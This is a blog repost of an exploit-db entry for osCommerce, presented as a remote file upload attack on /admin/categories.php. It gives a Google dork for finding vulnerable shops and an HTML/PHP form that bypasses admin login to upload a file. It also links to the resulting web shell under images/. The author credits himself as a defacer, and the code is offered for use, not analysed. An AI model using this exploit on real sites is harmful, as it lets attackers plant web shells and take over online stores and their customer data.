Commerce Remote File Upload Vulnerability (/admin/categories.php)

Posted: February 25, 2011 by Hacking & Relax in exploit

# Exploit Title: [oscommerce remote upload from categories.php]
# Google Dork: [“powered by oscommerce”]
# Date: [20-November-2010]
# Author: [Number 7]
#Contact: {an[dot]7[at]live[dot]fr}
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Tested on: [windows-linux-FreeBSD-Solaris]

exploit:

<html>
<head>
<title>Number 7</title>
</head>
<body>
<div style="text-align: center;"><big
style="color: rgb(253, 0, 0);"><big><big>Discovered
By Number 7<br>
</big></big></big><span
style="color: rgb(102, 102, 102);">(best defacer kairouan
tunisia 2010)</span><br>
</div>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>Oscommerce
script: Remote File Upload in /admin/Categories.php</big></big><br>
<?php $host ="site";
$path ="ath";
?>
<form name="new_product"
action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"
method="post" enctype="multipart/form-data"><br>
<input name="products_image" type="file"><br>
<input name="submit" value=" Save " type="submit"><br>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>shell
here:</big></big><br>
<?php echo ("Using upload File : <a href=http://$host/$path/images/product_info.php>$host/</>$path</>/images/product_info.php</a></font></body>");
?></form>
</body>
</html>

[~] Greetz tO: [Meher-Assel(Net-Own3r#Shichemt-Älen#Sami(s-man)#zone-h/crew#all tunisian hackers]

[~] Home :info-geek.com/ # v4-team.com/cc/

Download code: http://www.exploit-db.com/download/15587

Site: http://www.exploit-db.com/exploits/15587/

Advertisements
Comments
  1. Number 7 says:

    Thank you for sharing my bug 😀
    Number 7
    Tunisian Hacker

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s